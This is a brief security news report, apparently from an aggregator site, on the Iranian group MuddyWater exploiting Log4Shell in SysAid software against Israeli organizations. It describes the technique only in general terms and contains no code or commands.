Security News > 2022 > August > Microsoft: Iranian hackers still exploiting Log4j bugs against Israel
Hackers continue to exploit the Log4j vulnerability in vulnerable applications, as shown by the Iranian 'MuddyWater' threat actor who was found targeting Israeli organizations using the SysAid software.
The latest MuddyWater hacking campaign outlined in a Microsoft report yesterday constitutes the first example of leveraging vulnerable SysAid applications to breach corporate networks.
MuddyWater previously targeted VMWare instances that carried Log4j flaws to drop web shells, but assuming that these were eventually patched, the threat actors explored alternative options.
The Iranian hackers exploit Log4Shell flaws for initial access, running malicious PowerShell via a specially crafted request sent to vulnerable endpoints and dropping web shells.
Ligolo is an open-source reverse-tunneling tool that the hackers use for securing communications between backdoors and C2 infrastructure.
While Microsoft's report doesn't go into the details of the particular tool, we know from a March 2022 report by Security Joes that the hackers added useful features like execution checks and command-line parameters.
News URL
Related news
- Iranian hackers charged for ‘hack-and-leak’ plot to influence election (source)
- A Hacker's Era: Why Microsoft 365 Protection Reigns Supreme (source)
- Microsoft and DOJ disrupt Russian FSB hackers' attack infrastructure (source)
- Iranian hackers now exploit Windows flaw to elevate privileges (source)
- Iranian hackers act as brokers selling critical infrastructure access (source)
- Microsoft: Chinese hackers use Quad7 botnet to steal credentials (source)
- Iranian Hackers Use "Dream Job" Lures to Deploy SnailResin Malware in Aerospace Attacks (source)